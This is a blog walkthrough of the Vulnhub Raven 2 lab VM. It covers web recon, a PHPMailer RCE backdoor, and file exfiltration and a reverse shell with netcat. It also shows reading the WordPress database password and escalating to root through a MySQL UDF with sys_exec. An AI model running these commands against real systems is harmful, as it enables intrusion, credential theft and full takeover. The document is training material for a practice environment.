Привет товарищ,
It's been a while since my last post. I've been little busy because of the CTF challenge I'm organizing.
But enough of excuse, little го́пник.

Today little training: Raven2 (from Vulnhub)


URL: https://www.vulnhub.com/entry/raven-2,269/

Description:
Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach Raven?



Setup

Because of KISS principle I will export the IP of the target as env. variable.

export IP=192.168.56.104

If you need a little memo about pentest tools, check mine at:
https://gitlab.com/AGS_321/pentest_wiki/wikis/home

Port Scanning

nmap -sC -sV -oA nmap_out_details$(date +%Y-%m-%d:%H:%M:%S).txt $IP
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-27 14:10 CET
Nmap scan report for raven.local (192.168.56.104)
Host is up (0.00022s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
|   2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
|   256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_  256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Raven Security
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          34127/tcp  status
|_  100024  1          52980/udp  status
MAC Address: 08:00:27:88:92:54 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.65 seconds

So what I have here ?

  • SSH service (22)
  • Web service (80)
  • RPC service (111)

Ok let's start with the web service because from my experience it's the most easiest way to find a starting point.

Web Service Exploration

nikto -h http://$IP/ -Format txt -output nikto_out_$(date +%Y-%m-%d:%H:%M:%S).txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.104
+ Target Hostname:    192.168.56.104
+ Target Port:        80
+ Start Time:         2019-02-27 14:25:05 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x41b3 0x5734482bdcb00
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-6694: /.DS_Store: Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version.
+ OSVDB-3233: /icons/README: Apache default file found.
+ Uncommon header 'link' found, with contents: <http://raven.local/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
	+ /wordpress/: A Wordpress installation was found.
+ 7535 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2019-02-27 14:25:35 (GMT1) (30 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Interesting points:

  • .DS_Store file
  • wordpress installation

.DS_Store file

After a little bit of research I found this tool to extract and download all files pointed by the .DS_Store files.
https://github.com/lijiejie/ds_store_exp

But it's a dead end. Let's explore other lead.

Wordpress Installation

NB: On this kind of challenge it's generally better to setup raven.local to /etc/hosts.

So let's scan this wordpress installation.

wpscan --url http://$IP/wordpress/ --wp-content-dir wordpress -e u
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.4.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.56.104/wordpress/
[+] Started: Wed Feb 27 15:42:30 2019

Interesting Finding(s):

[+] http://192.168.56.104/wordpress/
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://192.168.56.104/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.56.104/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 4.8.7 identified (Insecure, released on 2018-07-05).
 | Detected By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.104/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.7'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.104/wordpress/, Match: 'WordPress 4.8.7'
 |
 | [!] 7 vulnerabilities identified:
 |
 | [!] Title: WordPress <= 5.0 - Authenticated File Delete
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9169
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9170
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
 |
 | [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9171
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9172
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9173
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
 |
 | [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9174
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9175
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a

[i] The main theme could not be detected.

[+] Enumerating All Plugins

[i] No plugins Found.

[+] Enumerating Config Backups
 Checking Config Backups - Time: 00:00:00 <=====================================================================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.

[+] Enumerating Users
 Brute Forcing Author IDs - Time: 00:00:01 <====================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] michael
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] steven
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Finished: Wed Feb 27 15:59:52 2019
[+] Requests Done: 40
[+] Cached Requests: 4
[+] Data Sent: 8.471 KB
[+] Data Received: 677.562 KB
[+] Memory used: 9.996 MB
[+] Elapsed time: 00:00:07

So:

  • Wordpress installation is outdated
  • No backup available
  • 2 users availables (michael;steven)

I've searched exploit for wordpress but found nothing really usefull.

So let's go deeper with a directory enumeration.

dirb http://$IP /usr/share/dirb/wordlists/common.txt -o dirb_out_$(date +%Y-%m-%d:%H:%M:%S).txt

So here only the interesting results..

==> DIRECTORY: http://192.168.56.104/css/
==> DIRECTORY: http://192.168.56.104/fonts/
==> DIRECTORY: http://192.168.56.104/img/
==> DIRECTORY: http://192.168.56.104/js/
==> DIRECTORY: http://192.168.56.104/manual/
==> DIRECTORY: http://192.168.56.104/vendor/
==> DIRECTORY: http://192.168.56.104/wordpress/

After some exploration it's appears that the flag is in http://192.168.56.104/vendor/PATH/.

flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}

It's seems to be a MD5 hash so let's crack it.
With https://hashkiller.co.uk/Cracker/MD5

a2c1f66d2b8051bd3a5874b5b6e43e21 MD5 Raven2Flag1

FirstBlood

In this directory you can see some interesting files such as PhpMailer.

Directrory_Listing_PhpMailer

PhpMailer RCE

As we can see in VERSION PhpMailer is outdated...
Let's see if it exist any usefull exploit.

Exploit-DB_RCEPhpMailer

So this exploit use the PHPMail function.
In my case the only compatible page is http://192.168.56.104/contact.php

After examining the code, I add to change some stuff:
0- Specify UTF-8 enconding for the script
1- Target should point to http://192.168.56.104/contact.php
2- Set the local IP in the Subprocess call to your IP
3- Location on the uploaded backdoor

NB: For the 3 point, the path can be deducted from the http://192.168.56.104/vendor/PATH/ file.

Exploit_RCEPhpMailer_Modif

Now let's setup an listenener on the target machine
And run the backdoor by loading the page http://192.168.56.104/backdoor.php
And voila !

WeGotShell

Yes ! A shell, that where the fun begin !

CatDancing_WeGoShell

Now let's add some fun and spawn a TTY shell.

python -c 'import pty;pty.spawn("/bin/bash")'

And retrieve the flag

cd /var/www
cat flag2.txt
flag2{6a8ed560f0b5358ecf844108048eb337}

Once cracked

6a8ed560f0b5358ecf844108048eb337 MD5 Raven2Flag2

MakeSomeNoiseFlag2

Everything is more fun with GIF

Get a foothold

Now that we have a user access on the target system I must find a way to elevate my privilege.

So I will use the infamous LinEnum.sh

Step 1

On the attack machine

# Get the script from Github
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

# Run a webserver to make the file accessible to the target
python -m SimpleHTTPServer 80 < LinEnum.sh

Step 2

On the target

wget http://192.168.56.103/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh > output

Step 3

On the attack machine

nc -l -p 1234 > output

On the target machine

nc -w 3 192.168.56.103 1234 < output

Step 4

Now I can examine results on my machine.

As wpscan showed, the wordpress users accounts are the same as the system users accounts.

uid=1000(michael) gid=1000(michael) groups=1000(michael),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
uid=1001(steven) gid=1001(steven) groups=1001(steven)

But not more usefull info.

Let's explore the full web directory.
As I have see before the name of the file used as flag is predictable

find /var/www/html -name "*flag*"

/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png
/var/www/html/wordpress/wp-includes/images/icon-pointer-flag-2x.png
/var/www/html/wordpress/wp-includes/images/icon-pointer-flag.png

And tada !!

Flag3

flag3{a0f568aa9de277887f37730d71520d9b}
a0f568aa9de277887f37730d71520d9b MD5 Raven2Flag3

MakeSomeNoiseFlag3

Just 1 more flag and a root way to find...
In my opinion, I can hit two targets with one bullet !

Escalate privilege with Mysql

One easy way to escalate privileges is to abuse of root process.
Let's take a look at the list of root process from LinEnum's output.

MySqlRunWithRootPriv

so let's check the current version installed.

dpkg -l |grep mysql

MySQlVersion

The last version is: MySQL 8.0
Bingo !

MysqlRootWhat

Ok let's explain this a little bit.

1- Mysql don't need to run as root in general
2- The password of Mysql is in the wordpress configuration
3- The version is outdated
So if it exist an exploit to use the privileges of this process, I can be root !
Did you get it little го́пник ?


Step 1: Find a possible Exploit

ExploitDB_Mysql

A possible exploit is available at:

www.exploit-db.com/exploits/1518

Step 2: Let's retrieve database password

find /var/www/html/wordpress -name "*config*"
/var/www/html/wordpress/wp-content/plugins/akismet/views/config.php
/var/www/html/wordpress/wp-admin/setup-config.php
/var/www/html/wordpress/wp-config.php
/var/www/html/wordpress/wp-config-sample.php

cat /var/www/html/wordpress/wp-config.php

MySQlRootPass

user: root
password: R@v3nSecurity

Step 3: Let's use the exploit

This exploit is a little bit tricky, so here I will just post steps to make it run.
In next article I will detail more how it's work, so stay tuned !

Step1: compile the .so

Since you can't compile the any UDF library's files on target machine you should compile it on your attack machine.

Install all needed tools

apt install default-libmysqlclient-dev

Compile the shared object

gcc -Wall -I/usr/include/mysql -shared -o lib_mysqludf_sys.so lib_mysqludf_sys.c

If error "m_ctype.h" not found => replace compile cmd with the following

gcc -Wall -I/usr/include/mysql/server -shared -o lib_mysqludf_sys.so lib_mysqludf_sys.c

Step2: upload it on the target and setup

wget -P /tmp 192.168.56.103/lib_mysqludf_sys.so
mysql -Dmysql -uroot -p'R@v3nSecurity'

create table improbable_upload(line blob);
insert into improbable_upload values(load_file('/tmp/lib_mysqludf_sys.so'));
select * from improbable_upload into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';

create function sys_exec returns int soname 'lib_mysqludf_sys.so';

Step3: Run listenener on attack machine

nc -lnvp 4443 .

Step4: Send you a shell

select sys_exec('nc 192.168.56.103 4443 -e /bin/bash');

And on the target machine you should see

SendYourselfAShell

Get the last flag

Flag4

flag4{df2bc5e951d91581467bb9a2a8ff4425}
df2bc5e951d91581467bb9a2a8ff4425 MD5 Raven2Flag4

Social stuff / Questions / Comments

Feel free to reach or tips me !

Mail: a_ghost_soul@protonmail.com
Twitter: @GhostAgs

If you appreciate my work please consider make a donation
Tipeee: https://fr.tipeee.com/ags-syndrome